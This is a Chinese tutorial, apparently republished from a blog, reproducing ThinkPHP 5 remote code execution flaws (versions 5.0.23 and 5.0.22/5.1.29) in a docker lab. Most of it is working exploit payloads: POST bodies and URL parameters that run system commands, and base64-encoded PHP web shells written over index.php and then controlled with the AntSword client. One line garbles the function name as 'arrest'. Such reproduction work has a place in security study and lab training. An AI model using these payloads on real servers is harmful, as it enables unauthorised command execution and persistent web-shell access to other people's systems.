一:5.0.23-rce版本漏洞复现
漏洞描述
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。 漏洞危害
环境搭建
启动环境
切换到/thinkphp/5.0.23-rce# 目录下
vim docker-compose.yml 
将version改为2,保存并退出
接着执行
docker-compose up -d
此时环境搭建成功
漏洞复现
在网页上利用POST构造payload
(1)查看目录下的文件(ls)
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
(2)查看id
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
(3)查看当前目录
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
将上述代码改为phpinfo,发现是可以输出关于 PHP 配置的信息
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
利用蚁剑工具getshell
由于存在过滤,需要用到base64加密来使我们的一句话木马上传成功
我们知道了一定存在index.php这个文件,那么我们就对其进行修改为一句话木马的样式
利用 echo “” >index.php 进行测试
为了显示我们成功注入,我们在其中添加字段变为
echo “aaabbb” >index.php
对引号内的进行base64,注意此时的引号不需要进行加密
经过测试,发现eval函数是注入不了的,需要替换为arrest函数才可以成功注入
所以
文章来源地址https://www.toymoban.com/news/detail-518663.html
将aaa<?php @assert($_POST['xss']);?>bbb 进行base64编码
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > index.php
成功回显出aaabbb,说明是加入到了index.php里了
开始用蚁剑,URL地址填写我们一句话木马的位置
注意要选择char16和base64
测试连接成功
可以看到我们刚才写入的一句话
二:5-rce版本漏洞复现(Thinkphp5 5.0.22/5.1.29)
环境搭建
启动环境
切换到/thinkphp/5-rce# 目录下
vim docker-compose.yml 
将version改为2,保存并退出
接着执行
docker-compose up -d
此时环境以成功搭建
漏洞复现
(1)输出关于 PHP 配置的信息
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
(2)whoami
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
(3)还可以将php代码写入文件
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>
接着访问shell.php
利用蚁剑工具getshell
由于存在过滤,需要用到base64加密来使我们的一句话木马上传成功
我们知道了一定存在index.php这个文件,那么我们就对其进行修改为一句话木马的样式
aa<?php @eval($_REQUEST['attack']) ?>bb将上面的一句话进行base64加密
将一句话写入index.php
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > index.php
成功回显出aabb,说明是加入到了index.php里了
开始用蚁剑,URL地址填写我们一句话木马的位置
注意要选择char16和base64
测试连接成功
可以看到我们刚才写入的一句话
此时复现圆满完成~文章来源:https://www.toymoban.com/news/detail-518663.html
到了这里,关于ThinkPHP5系列远程代码执行漏洞复现(详细)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[漏洞复现] jenkins 远程代码执行 (CVE-2019-100300)](https://imgs.yssmx.com/Uploads/2024/02/570333-1.png)
